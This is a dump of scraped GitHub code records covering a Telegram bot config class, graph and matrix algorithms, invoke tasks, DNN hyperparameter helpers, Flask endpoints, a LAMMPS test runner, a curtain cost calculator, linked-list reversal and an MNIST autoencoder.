Try again\")\r\n if num_times_open > 1:\r\n for i in range(num_times_open - 1):\r\n webbrowser.get(os_default).open_new_tab(URL)\r\n sleep(.15)\r\n\r\n\r\ngetos()\r\n","repo_name":"Luka-SA/browser_spammer","sub_path":"browser_spammer.py","file_name":"browser_spammer.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23402552590","text":"import json\nimport os\n\n\ndefault_section = \"telegram\"\ndefault_config_path = \"./config.json\"\n\n\nclass ConfigException(Exception):\n pass\n\n\nclass ConfigFileMissing(ConfigException):\n pass\n\n\nclass ConfigSectionMissing(ConfigException):\n pass\n\n\nclass Config:\n\n def __init__(self, path: str = None):\n self.path = path if path else default_config_path\n self._dict = {}\n\n @staticmethod\n def get_full_option_name(section: str, option: str) -> str:\n return f\"{section}_{option}\"\n\n @staticmethod\n def get_env_var(section: str, option: str = None, fallback: str = None) -> str:\n _var_name = Config.get_full_option_name(section, option)\n return os.getenv(_var_name, fallback)\n\n def open(self, config_path: str = None) -> {str: str}:\n if config_path:\n self.path = config_path\n if os.path.isfile(self.path):\n with open(self.path) as c:\n self._dict = json.loads(c.read())\n return self\n else:\n raise ConfigFileMissing(\"Config file does not exists\")\n\n def copy(self):\n return self._dict\n\n def get_section(self, section: str) -> {str: str}:\n if section in self._dict.keys():\n return self._dict[section]\n else:\n raise ConfigSectionMissing(\"Section does not exists\")\n\n def has_section(self, section: str) -> bool:\n try:\n return section in self._dict.keys()\n except KeyError:\n return False\n\n def get(self, section: str, option: str = None, fallback=None):\n if option is None:\n option = section\n section = default_section\n if self.get_env_var(section, option):\n return self.get_env_var(section, option)\n else:\n if option in self._dict[section].keys():\n return self._dict[section][option]\n else:\n return fallback\n\n def has(self, section: str, option: str = None) -> bool:\n if option is None:\n option = section\n section = default_section\n try:\n return bool(self.get_env_var(section, option)) or option in self._dict[section].keys()\n except KeyError:\n return False\n","repo_name":"xpavlus/tg-bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72620358313","text":"from typing import List\r\nfrom collections import defaultdict\r\n \r\ndef dfs_helper(u, adj, visited):\r\n stack = [u]\r\n while stack:\r\n v = stack.pop()\r\n if not visited[v]:\r\n visited[v] = True\r\n for neighbor in adj[v]:\r\n if not visited[neighbor]:\r\n stack.append(neighbor)\r\n\r\n \r\n# def getTransposeGraph(adj):\r\n# n = len(adj)\r\n# trans_adj = [[] for _ in range(n)]\r\n# for u in range(n):\r\n# for v in adj[u]:\r\n# trans_adj[v].append(u)\r\n# return trans_adj\r\n \r\ndef findAllMotherVertices(adj,trans_adj):\r\n n = len(adj)\r\n visited = initialize_visited(n)\r\n \r\n last_dfs_called_on = -1\r\n \r\n for u in range(n):\r\n if not visited[u]:\r\n dfs_helper(u, adj, visited)\r\n last_dfs_called_on = u\r\n\r\n visited = initialize_visited(n)\r\n visited = [False for _ in range(n)]\r\n dfs_helper(last_dfs_called_on, adj, visited)\r\n \r\n for u in range(n):\r\n if not visited[u]:\r\n return []\r\n 
motherVertex = last_dfs_called_on\r\n # trans_adj1 = getTransposeGraph(adj)\r\n\r\n visited = initialize_visited(n)\r\n dfs_helper(motherVertex, trans_adj, visited)\r\n \r\n\r\n ans = []\r\n \r\n for u in range(n):\r\n if visited[u]:\r\n ans.append(u)\r\n \r\n return ans\r\n\r\n\r\nn, m = map(int, input().split())\r\nadjacency_list = [ [] for i in range(n)]\r\ntrans_adj = [[] for _ in range(n)]\r\n# adjacency_list = defaultdict(list)\r\n# trans_adj = defaultdict(list)\r\nfor _ in range(m):\r\n a, b = map(int, input().split())\r\n trans_adj[a-1].append(b-1)\r\n adjacency_list[b-1].append(a-1)\r\n# print(adjacency_list)\r\nmotherVertices = findAllMotherVertices(adjacency_list,trans_adj)\r\nfor i in range(len(motherVertices)):\r\n motherVertices[i] += 1\r\n\r\nprint(len(motherVertices))\r\nprint(\" \".join(map(str, motherVertices)))","repo_name":"ashwinnellimuttath/Algorithms-Coursework-UCR","sub_path":"5assignment/challenge/capital/4capital.py","file_name":"4capital.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21912494336","text":"import os\nimport shlex\nimport sys\n\nfrom invoke import task, util\n\n\nin_ci = os.environ.get(\"CI\", \"false\") == \"true\"\nif in_ci:\n pty = False\nelse:\n pty = util.isatty(sys.stdout) and util.isatty(sys.stderr)\n\n\nCODE_PATHS = (\n \"isbinary\",\n \"tests\",\n \"tasks.py\",\n)\n\n\ndef _quote(*args: str) -> str:\n return \" \".join(map(shlex.quote, args))\n\n\n@task\ndef reformat(c):\n c.run(_quote(\"isort\", \"--skip=/tests/fixtures/\", *CODE_PATHS), pty=pty)\n c.run(_quote(\"black\", \"--exclude=/tests/fixtures/\", *CODE_PATHS), pty=pty)\n\n\n@task\ndef lint(c):\n flake8_args = (\"flake8\", \"--show-source\", \"--statistics\", \"--exclude\", \"tests/fixtures\")\n c.run(_quote(*flake8_args, *CODE_PATHS), pty=pty)\n\n\n@task\ndef test(c, onefile=\"\", verbose=False):\n pytest_args = [\n \"pytest\",\n \"--strict-config\",\n \"--cov=isbinary\",\n \"--cov-report=term-missing\",\n \"--ignore=tests/fixtures\",\n ]\n if in_ci:\n pytest_args.extend((\"--cov-report=xml\", \"--strict-markers\"))\n else:\n pytest_args.append(\"--cov-report=html\")\n\n if onefile:\n pytest_args.append(onefile)\n\n if verbose:\n pytest_args.append(\"-vv\")\n\n c.run(_quote(*pytest_args), pty=pty)\n\n\n@task\ndef type_check(c):\n c.run(_quote(\"mypy\", *CODE_PATHS), pty=pty)\n\n\n@task\ndef docs(c):\n with c.cd(\"docs\"):\n c.run(\"sphinx-build -M html source build -a -W\", pty=pty)\n","repo_name":"djmattyg007/python-isbinary","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41878427716","text":"\"\"\"\nGiven an m x n matrix, return all elements of the matrix in spiral order.\n\n\n\nExample 1:\n\n\nInput: matrix = [[1,2,3],[4,5,6],[7,8,9]]\nOutput: [1,2,3,6,9,8,7,4,5]\n\nExample 2:\n\n\nInput: matrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\nOutput: [1,2,3,4,8,12,11,10,9,5,6,7]\n\n\nConstraints:\n\nm == matrix.length\nn == matrix[i].length\n1 <= m, n <= 10\n-100 <= matrix[i][j] <= 100\n\"\"\"\nfrom typing import List\n\n\nclass Solution1:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n result = []\n row = len(matrix)\n col = len(matrix[0])\n left, right, top, bottom = 0, col - 1, 0, row - 1\n while True:\n for j in range(left, right + 1):\n result.append(matrix[top][j])\n top += 1\n if top > bottom:\n break\n for i in 
range(top, bottom + 1):\n result.append(matrix[i][right])\n right -= 1\n if left > right:\n break\n for j in range(right, left - 1, -1):\n result.append(matrix[bottom][j])\n bottom -= 1\n if top > bottom:\n break\n for i in range(bottom, top - 1, -1):\n result.append(matrix[i][left])\n left += 1\n if left > right:\n break\n return result\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/leetcodepy/spiral_matrix.py","file_name":"spiral_matrix.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
+{"seq_id":"7996814990","text":"\"\"\"\n\nThis file contains functions related to initializing the constants and \nhyperparameters that are used throughout DNN training and evaluation scripts. \nThe primary purpose of all of these functions is to return a dict structure to \nour primary analysis scripts.\n\n\"\"\"\n\nimport torch.nn as nn\n\n# %% Get Constants\n\n\ndef get_constants(device='cpu',\n PATH=\"../results/training results\",\n input_size=1,\n output_size=1,\n lr_step_size=1,\n lr_patience=1,\n min_lr=1e-5,\n num_trials=1,\n num_timestepsPerTrial=10000,\n criterion=nn.MSELoss(),\n num_epochs=1000,\n optuna_trials=3,\n optuna_timeout=None,\n prediction_horizon=1,\n fs=1000,\n fsNew=30,\n early_stopping_patience=5\n ):\n \"\"\"\n Set constants (parameters not optimized with Optuna) and return as a \n dictionary structure\n\n Parameters\n ----------\n device : string\n An object that represents the device on which a tensor will be \n allocated during the DNN training process. \n The default is 'cpu'.\n PATH : string\n The filepath that is used to save the DNN evaluation results. \n The default is a results folder within the project.\n input_size : int\n The number of DNN input features used as predictors. \n The default is 1.\n output_size : int\n The number of DNN output target variables (response). \n The default is 1.\n lr_step_size : int\n Number of epochs with no improvement after which learning rate will be \n reduced. For example, if lr_step_size = 2, then we will ignore the \n first 2 epochs with no improvement, and will only decrease the LR after \n the 3rd epoch if the loss still hasn’t improved then. \n The default is 1.\n lr_patience : int\n Number of epochs to wait before resuming normal operation after lr has \n been reduced.\n The default is 1.\n min_lr : float\n A lower bound on the learning rate. \n The default is 1e-5.\n num_trials : int\n The number of data trials within the dataset. This value is important \n for constructing tensors and training batches. \n The default is 1.\n num_timestepsPerTrial : int\n The number of timesteps (samples) per data trial.\n The default is 10000.\n criterion : torch.nn.modules.loss\n The loss function used during the DNN training process. Loss functions \n are used to gauge the error between the prediction output and the \n provided target value.\n The default is torch.nn.MSELoss().\n num_epochs : int, optional\n An epoch is a measure of the number of times all training data is used \n once to update the parameters.\n The default is 1000.\n optuna_trials : int, optional\n The number of iterations that Optuna executes its evaluation of an \n objective function. Each trial suggests values of hyperparameters based\n on Optuna's search criteria. \n The default is 3.\n optuna_timeout : float, optional\n Stop Optuna study after the given number of second(s). If this argument \n is set to None, the study is executed without time limitation. 
\n        The default is None.\n    prediction_horizon : int, optional\n        How many timesteps/samples ahead the DNN model predicts into the \n        future.\n        The default is 1.\n    fs : int\n        The sample rate that the time series data was collected in Hz.\n        The default is 1000.\n    fsNew : int\n        The value to resample the time series data in Hz. The resampled signal \n        starts at the same value as the original signal but is sampled \n        differently according to fsNew. A Fourier method is used so the time\n        series signals must be periodic. \n        The default is 30.\n    early_stopping_patience : int\n        This is the number of epochs without improvement after which training \n        will be early stopped. A larger patience means that an experiment will \n        wait longer before stopping an experiment.\n        The default is 5.\n\n    Returns\n    -------\n    constants : dict\n        This dictionary has the name of each constant as keys and their values. \n        This dict contains constant information to be passed across \n        various DNN training and evaluation functions. The data within this \n        dict is not meant to be changed after initialization (i.e., these are \n        values that Optuna does not optimize).\n\n    \"\"\"\n\n    constants = {'device': device,\n                 'results path': PATH,\n                 'input size': input_size,\n                 'output size': output_size,\n                 'learning rate scheduler delay': lr_step_size,\n                 'learning rate scheduler patience': lr_patience,\n                 'minimum learning rate': min_lr,\n                 'number of walking trials': num_trials,\n                 'number of timesteps per trial': num_timestepsPerTrial,\n                 'loss function': criterion,\n                 'max number of epochs': num_epochs,\n                 'number of optuna trials': optuna_trials,\n                 'optuna timeout': optuna_timeout,\n                 'prediction horizon': prediction_horizon,\n                 'original sample freq': fs,\n                 'sub-sample freq': fsNew,\n                 'early stopping patience': early_stopping_patience\n                 }\n\n    return constants\n\n\n# %% Get Hyperparameter Ranges\n\ndef get_hyperparameter_ranges(seq_len=[2, 20],\n                              lr=[1e-5, 1e-1],\n                              weight_decay = [1e-5, 1e-1], \n                              gamma = [0.1, 0.9],\n                              num_layers=[1, 3],\n                              num_HUs_pow=[4, 9],\n                              dropout=[0.1, 0.5],\n                              P=[4, 7],\n                              batch_pow=[4, 8],\n                              noise_std=[0.1, 1]\n                              ):\n    \"\"\"\n    Sets the hyperparameter ranges used during the Optuna optimization trials. \n    Each input parameter is a list of two elements (lower and upper bounds of \n    the hyperparameter range) and the output is a dictionary containing the \n    names of each hyperparameter and the range values. \n\n    Parameters\n    ----------\n    seq_len : list of int, optional\n        Sequence Length is the length of the historical sequence of input data. 
\n        If the sequence length is N, then the window range of the input data \n        will be from samples [0:-1,-2,...,-N].\n        The default is [2,20].\n    lr : list of float, optional\n        The learning rate is a hyperparameter that controls how much to change \n        the model in response to the estimated error each time the model \n        weights are updated.\n        The default is [1e-5, 1e-1].\n    weight_decay : list of float, optional\n        The weight decay, which is a regularization technique used by adding a \n        small penalty (L2 norm of all the weights of the model) to the loss \n        function.\n        The default is [1e-5, 1e-1].\n    gamma : list of float, optional\n        The multiplicative factor by which the learning rate scheduler reduces \n        the learning rate.\n        The default is [0.1, 0.9].\n    num_layers : list of int, optional\n        The number of layers in the DNN.\n        The default is [1,3].\n    num_HUs_pow : list of int, optional\n        The powers of 2 for the neural network layers' number of hidden units.\n        Searching in powers of two reduces the search space logarithmically.\n        The default is [4,9].\n    dropout : list of float, optional\n        Probability of an element to be zeroed during training. This is a \n        regularization technique used to avoid overfitting. \n        The default is [0.1, 0.5].\n    P : list of int, optional\n        The powers of 2 for the DARNN's number of decoder units.\n        The default is [4,7].\n    batch_pow : list of int, optional\n        The powers of 2 for the batch size. Batch size is a term used in \n        machine learning and refers to the number of training examples \n        utilized in one iteration.\n        The default is [4,8].\n    noise_std : list of float, optional\n        The standard deviation of the noise injected onto the training data. \n        This random noise is added to each training sample to reduce the chance\n        of overfitting.\n        The default is [0.1, 1].\n\n    Returns\n    -------\n    hp_ranges : dict\n        This dictionary has the name of each hyperparameter as keys and the\n        range that Optuna will search as values. Each input parameter for this \n        function is a list of 2 elements where the first element is the lower \n        bound of the search range and the second element is the upper bound of \n        the search range. Note that some hyperparameters are only used for \n        specific DNN types. 
\n\n \"\"\"\n\n hp_ranges = {\n 'sequence length': seq_len,\n 'learning rate': lr,\n 'weight decay': weight_decay,\n 'scheduler factor': gamma,\n 'number of layers': num_layers,\n 'hidden units power': num_HUs_pow,\n 'dropout factor': dropout,\n 'decoder hidden units power': P,\n 'batch size power': batch_pow,\n 'noise STD': noise_std\n }\n\n return hp_ranges\n","repo_name":"chrisprasanna/RoboAnkle_DeepLearning","sub_path":"src/set_parameters.py","file_name":"set_parameters.py","file_ext":"py","file_size_in_byte":9697,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"22651276024","text":"def create_endpoints(app, movie_info_service, rec_service, search_service):\n @app.route('/api/ping', methods=['GET'])\n def ping():\n return 'pong!'\n\n @app.route('/api/', methods=['GET'])\n def home():\n front_rec = rec_service.get_front_rec()\n return {\n 'front_rec': front_rec\n }\n \n @app.route('/api/movies/', methods=['GET'])\n def movie(movie_id):\n movie_info = movie_info_service.get_movie_info(movie_id)\n actor_rec = rec_service.get_actor_rec(movie_id)\n director_rec = rec_service.get_director_rec(movie_id)\n similar_rec = rec_service.get_similar_rec(movie_id)\n return {\n 'movie_info': movie_info,\n 'actor_rec': actor_rec,\n 'director_rec': director_rec,\n 'similar_rec': similar_rec\n }\n\n @app.route('/api/search/', methods=['GET'])\n def search(keyword):\n return search_service.search(keyword)","repo_name":"cornandme/mirror-movie","sub_path":"src/api/view/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10258365238","text":"# LAMMPS regression test driver using Python's unittest\nfrom __future__ import print_function\n__author__ = 'Richard Berger'\n__email__ = \"richard.berger@temple.edu\"\n\nimport unittest\nimport os\nimport sys\nimport shlex\nfrom datetime import datetime\nfrom subprocess import call, Popen, PIPE\n\n# Before running any tests these two environment variables must be set\n\n# full path of LAMMPS main directory\nLAMMPS_DIR=os.environ['LAMMPS_DIR']\n\n# full path of LAMMPS binary being tested\nLAMMPS_BINARY=os.environ['LAMMPS_BINARY']\n\n# one of openmpi, mpich\nLAMMPS_MPI_MODE=os.environ.get('LAMMPS_MPI_MODE', 'openmpi')\n\n# test modes separated by colons. e.g. serial:parallel:omp:valgrind\nLAMMPS_TEST_MODES=os.environ.get('LAMMPS_TEST_MODES', 'serial').split(':')\n\n# list of folders which should be scanned for tests\nLAMMPS_TEST_DIRS=os.environ.get('LAMMPS_TEST_DIRS', '').split(':')\n\nclass LAMMPSTestCase:\n \"\"\" Mixin class for each LAMMPS test case. 
Defines utility function to run in serial or parallel\"\"\"\n def run_script(self, script_path, nprocs=1, nthreads=1, ngpus=1, screen=True, log=None, launcher=[], force_openmp=False, force_mpi=False, force_gpu=False, force_kokkos=False, force_cuda=False, test_name=\"\"):\n working_dir = os.path.dirname(script_path)\n script_name = os.path.basename(script_path)\n\n if screen:\n output_options = []\n else:\n output_options = [\"-screen\", \"none\"]\n\n if log:\n output_options += [\"-log\", log]\n\n exe = launcher + [LAMMPS_BINARY]\n\n mpi_options = []\n lammps_options = [\"-in\", script_name] + output_options\n\n if nthreads > 1 and force_openmp:\n lammps_options += [\"-sf\", \"omp\", \"-pk\", \"omp\", str(nthreads)]\n\n if force_kokkos:\n lammps_options += [\"-k\", \"on\"]\n if nthreads > 1:\n lammps_options += [\"t\", str(nthreads)]\n if force_cuda:\n lammps_options += [\"g\", str(ngpus)]\n lammps_options += [\"-sf\", \"kk\", \"-pk\", \"kokkos newton on neigh half\"]\n\n if force_gpu:\n lammps_options += [\"-pk\", \"gpu\", \"1\", \"-sf\", \"gpu\"]\n\n if nprocs > 1 or force_mpi:\n mpi_options = [\"mpirun\", \"-np\", str(nprocs)]\n if LAMMPS_MPI_MODE == \"openmpi\":\n mpi_options += [\"-x\", \"OMP_NUM_THREADS=\"+str(nthreads)]\n elif LAMMPS_MPI_MODE == \"mpich\":\n mpi_options += [\"-env\", \"OMP_NUM_THREADS\", str(nthreads)]\n\n class_name = type(self).__name__\n full_test_name = f\"{class_name}_{test_name}\"\n outfile_path = os.path.join(working_dir, f\"{full_test_name}_stdout.log\")\n errfile_path = os.path.join(working_dir, f\"{full_test_name}_stderr.log\")\n\n start_time = datetime.now()\n\n full_command = mpi_options + exe + lammps_options\n print(\" \".join(full_command))\n\n with open(outfile_path, \"w+\") as outfile, open(errfile_path, \"w+\") as errfile:\n retcode = call(full_command, cwd=working_dir, stdout=outfile, stderr=errfile)\n\n end_time = datetime.now()\n duration = end_time - start_time\n\n print(f\"Completed in: {duration.total_seconds()} seconds\")\n\n # output for JUnit attachment plugin\n print(f\"[[ATTACHMENT|{outfile_path}]]\")\n print(f\"[[ATTACHMENT|{errfile_path}]]\")\n\n return retcode\n\n\nclass LAMMPSRegressionTestCase:\n def run_regression(self, script_name, test_name):\n cmd = f'lammps_run_regression_test -v -j -g {LAMMPS_BINARY} {script_name}'\n cmd = shlex.split(cmd)\n\n p = Popen(cmd, stdout=PIPE, stderr=PIPE)\n output, error = p.communicate()\n rc = p.returncode\n\n print(output.decode('utf-8'), file=sys.stdout)\n print(error.decode('utf-8'), file=sys.stderr)\n\n return rc\n\ndef SkipTest(cls, func_name, reason):\n \"\"\" utility function to skip a specific test for a reason \"\"\"\n setattr(cls, func_name, unittest.skip(reason)(getattr(cls, func_name)))\n","repo_name":"lammps/lammps-testing","sub_path":"lammps_testing/testrunner.py","file_name":"testrunner.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"83870639","text":"import json\nimport os\n\nimport pytest\nimport yatest.common\n\nfrom crypta.lib.python import (\n templater,\n time_utils,\n yaml_config,\n)\nfrom crypta.lib.python.logbroker.test_helpers import consumer_utils\nfrom crypta.lib.python.yt.test_helpers import (\n files,\n tables,\n tests,\n)\nfrom crypta.lookalike.lib.python import test_utils\nfrom crypta.lookalike.proto.mode_pb2 import ModeValue\nfrom crypta.lookalike.proto.yt_node_names_pb2 import TYtNodeNames\nfrom crypta.lookalike.services.segment_dssm_applier.proto.config_pb2 
import TConfig\n\n\nVERSION = \"1584085850\"\n\nYT_NODE_NAMES = TYtNodeNames()\n\nMAPPING_LOCAL_PATH = \"./mapping.json\"\n\n\ndef get_config_file(yt_stuff, logbroker_port, mode):\n config_file_path = yatest.common.test_output_path(\"config.yaml\")\n\n templater.render_file(\n yatest.common.source_path(\"crypta/lookalike/services/segment_dssm_applier/bundle/config.yaml\"),\n config_file_path,\n {\n \"environment\": \"qa\",\n \"yt_proxy\": yt_stuff.get_server(),\n \"lb_url\": \"localhost\",\n \"lb_topic\": \"default-topic\",\n \"lb_port\": logbroker_port,\n \"scope\": \"direct\",\n \"input_table\": \"//home/crypta/qa/direct\",\n \"mode\": mode,\n },\n )\n\n return config_file_path\n\n\ndef get_versioned_path(config, node):\n return os.path.join(config.VersionsDir, VERSION, node)\n\n\ndef get_output_tables(config, mode):\n output_tables = [(\n tables.YsonTable(\n \"errors.yson\",\n os.path.join(config.ErrorsDir, VERSION),\n yson_format=\"pretty\"\n ),\n [tests.IsAbsent()],\n )]\n\n if mode == ModeValue.ALL:\n output_tables = [\n (\n tables.YsonTable(\n \"segment_embeddings.yson\",\n get_versioned_path(config, YT_NODE_NAMES.SegmentEmbeddingsTable),\n yson_format=\"pretty\",\n on_read=test_utils.embeddings_on_read()\n ),\n [tests.Diff()],\n ),\n (\n tables.YsonTable(\n \"segment_metas.yson\",\n get_versioned_path(config, YT_NODE_NAMES.SegmentMetasTable),\n yson_format=\"pretty\"\n ),\n [tests.Diff()],\n ),\n ]\n elif mode == ModeValue.NEW:\n output_tables = [\n (\n tables.YsonTable(\n \"fresh_segment_embeddings.yson\",\n os.path.join(get_versioned_path(config, YT_NODE_NAMES.FreshSegmentEmbeddingsDir), VERSION),\n yson_format=\"pretty\",\n on_read=test_utils.embeddings_on_read()\n ),\n [tests.Diff()],\n ),\n (\n tables.YsonTable(\n \"fresh_segment_metas.yson\",\n os.path.join(get_versioned_path(config, YT_NODE_NAMES.FreshMetasDir), VERSION),\n yson_format=\"pretty\"\n ),\n [tests.Diff()],\n ),\n ]\n return output_tables\n\n\n@pytest.mark.parametrize(\"mode\", [\n pytest.param(ModeValue.NEW, id=\"new\"),\n pytest.param(ModeValue.ALL, id=\"all\"),\n])\ndef test_basic(yt_stuff, consumer, logbroker_port, mode):\n config_file = get_config_file(yt_stuff, logbroker_port, mode)\n config = yaml_config.parse_config(TConfig, config_file)\n\n results = tests.yt_test(\n yt_client=yt_stuff.get_yt_client(),\n binary=yatest.common.binary_path(\"crypta/lookalike/services/segment_dssm_applier/bin/crypta-lookalike-segment-dssm-applier\"),\n args=[\n \"--config\", config_file\n ],\n data_path=yatest.common.test_source_path(\"data\"),\n input_tables=[\n (tables.YsonTable(\"lals.yson\", config.LalsTable, on_write=test_utils.lals_on_write()), tests.TableIsNotChanged()),\n (files.YtFile(yatest.common.work_path(\"dssm_lal_model.applier\"), get_versioned_path(config, YT_NODE_NAMES.DssmModelFile), on_write=files.OnWrite()), tests.Exists()),\n (files.YtFile(yatest.common.work_path(\"segments_dict\"), get_versioned_path(config, YT_NODE_NAMES.SegmentsDictFile), on_write=files.OnWrite()), tests.Exists()),\n ],\n output_tables=get_output_tables(config, mode),\n env={\"YT_TOKEN\": \"FAKE\", time_utils.CRYPTA_FROZEN_TIME_ENV: VERSION, \"MAPPING_LOCAL_PATH\": MAPPING_LOCAL_PATH},\n )\n\n with open(MAPPING_LOCAL_PATH, \"r\") as file:\n mapping = json.load(file)\n\n for key in mapping:\n mapping[key] = sorted(mapping[key])\n os.remove(MAPPING_LOCAL_PATH)\n\n return {\n \"yt_results\": results,\n \"data_written\": sorted(consumer_utils.read_all(consumer, timeout=30)),\n \"mapping\": mapping,\n 
}\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/main (54).py","file_name":"main (54).py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7707026664","text":"#calculation1.py\n#Calculation Series 1\n'''\nAuthor: Bikrant Karki\nTask:curtain size and the cost calculation\n 1. Take the input of current rate per meter\n 2. Take the Input is the curtain for Door or Window?\n 3. Take the input of Length and breadth for the curtain\n 4. Print the total area of curtain size\n 5. Calculate the Total cost =area x current rate\n 6. Print the Total Cost for Cutain of Door or window \n \nTarget user: Who want to learn Python\nTarget System:GNU/Linux\nInterface:command line\nFunctional Requirement: \nTesting: Simple Run Test|| python3\nMaintainer: bikrantkarki.com.np|| bikrant7@gmail.com\n'''\n\n#Set the variables\ncurtain=\"\"\n#length= float\n#breadth= float\n#rate = float\ncost = float\narea = float\nmore= \"\"\ndivider =\"--------------**********------------------\"\n#prompt for user-defined information\n\nrate = input(\"enter the current market rate for the curtain per meter:\")\ncurtain= input(\"You are lokking curtain for Door or window?:\")\nlength = input (\"enter the Length for your curtain in meter:\")\nbreadth= input (\"enter the breadth for your curtain in meter:\")\n\n#Calculate according to the information\nlength= float(length) #should convert the input and define the type\nbreadth= float(breadth)\nrate = float(rate)\n\narea = length*breadth;\nprint(\"The toal area for\", curtain, \"is\", area ,\"square meter\")\ncost= rate * area;\nprint(\"The Total cost for the\", curtain, \"is\",\"Rs.\", cost)\n\nprint(divider)\nprint(\"\\t Total Area \\t\\t Total Cost \\t Location\")\nprint(\"\\t\",area, \"sqm\" ,\"\\t\\t\", \"Rs.\",cost, \"\\t\", curtain)\nprint(divider)\n\n'''\nOutput:\n\nenter the current market rate for the curtain per meter:250\nYou are lokking curtain for Door or window?:front hall door\nenter the Length for your curtain in meter:1.5\nenter the breadth for your curtain in meter:3.5\nThe toal area for front hall door is 5.25 square meter\nThe Total cost for the front hall door is Rs. 1312.5\n--------------**********------------------\n\t Total Area \t\t Total Cost \t Location\n\t 5.25 sqm \t\t Rs. 1312.5 \t front hall door\n--------------**********------------------\n\n'''\n","repo_name":"bikrantkarki/Python3_training","sub_path":"calculation1.py","file_name":"calculation1.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8449262229","text":"env = Environment()\n\nlibs = Split(\"vmap fig options utils 2d\")\n\nenv.Append (CCFLAGS=['-O2'])\nenv.Append (CPPPATH = [\"../../core\"])\nenv.Append (LIBPATH = list(map(lambda s: \"../../core/\"+s, libs)) )\nenv.Append (LIBPATH = [\".\"] )\nenv.Prepend(LIBS=libs)\n\nenv.Program(['fig_old2new.cpp','zn_key.cpp'])\n\n","repo_name":"ushakov/mapsoft","sub_path":"vector/compat/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"72130340714","text":"# ! 
change LOCAL to False before submitting !\n# set LOCAL to True for local testing\n\nLOCAL = False\n\nif LOCAL:\n    class DoubleConnectedNode: \n        def __init__(self, value, next=None, prev=None): \n            self.value = value \n            self.next = next \n            self.prev = prev\n\ndef solution(node):\n    n = node # First element\n    m = node.next # Second element\n    n.next = None # the next pointer becomes None, i.e. the head has become the tail\n    n.prev = m # The second element has become second from the end\n    while m is not None:\n        m.prev = m.next\n        m.next = n\n        n = m\n        m = m.prev\n    node = n \n    return node\n\ndef test():\n    node3 = DoubleConnectedNode(\"node3\")\n    node2 = DoubleConnectedNode(\"node2\")\n    node1 = DoubleConnectedNode(\"node1\")\n    node0 = DoubleConnectedNode(\"node0\")\n\n    node0.next = node1\n\n    node1.prev = node0\n    node1.next = node2\n\n    node2.prev = node1\n    node2.next = node3\n\n    node3.prev = node2\n    new_head = solution(node0)\n    assert new_head is node3\n    assert node3.next is node2\n    assert node2.next is node1 \n    assert node2.prev is node3\n    assert node1.next is node0 \n    assert node1.prev is node2\n    assert node0.prev is node1\n\nif __name__ == '__main__':\n    test()","repo_name":"Vandomar/algorithm-and-data-","sub_path":"Data/Двусвязнй/double.py","file_name":"double.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25237834770","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\n# Hyperparameters\nbatch_size = 256\nlearning_rate = 0.001\nnum_epochs = 200\n\n# Data preprocessing\ntransform = transforms.Compose([\n    transforms.ToTensor(),\n    transforms.Normalize((0.1307,), (0.3081,))\n])\n\n# Load the MNIST dataset\ntrain_dataset = torchvision.datasets.MNIST(root='data', train=True, transform=transform, download=True)\ntrain_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n\n\n# Stacked autoencoder model\nclass StackedAutoencoder(nn.Module):\n    def __init__(self):\n        super(StackedAutoencoder, self).__init__()\n        self.encoder = nn.Sequential(\n            nn.Linear(28 * 28, 128),\n            nn.ReLU(),\n            nn.Linear(128, 64),\n            nn.ReLU(),\n            nn.Linear(64, 12)\n        )\n        self.decoder = nn.Sequential(\n            nn.Linear(12, 64),\n            nn.ReLU(),\n            nn.Linear(64, 128),\n            nn.ReLU(),\n            nn.Linear(128, 28 * 28),\n            nn.Sigmoid()\n        )\n\n    def forward(self, x):\n        encoded = self.encoder(x)\n        decoded = self.decoder(encoded)\n        return decoded\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = StackedAutoencoder().to(device)\n\n# Loss function and optimizer\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\nwriter = SummaryWriter(\"runs/stack_log\")\n\nstep = 2\n# Train the model\nfor epoch in range(num_epochs):\n    running_loss = 0.0\n    for i, (images, _) in enumerate(train_loader):\n        images = images.view(images.size(0), -1).to(device)\n\n        # Forward pass\n        outputs = model(images)\n        loss = criterion(outputs, images)\n        running_loss += loss.item()\n        # Backward pass\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n\n        # if (i 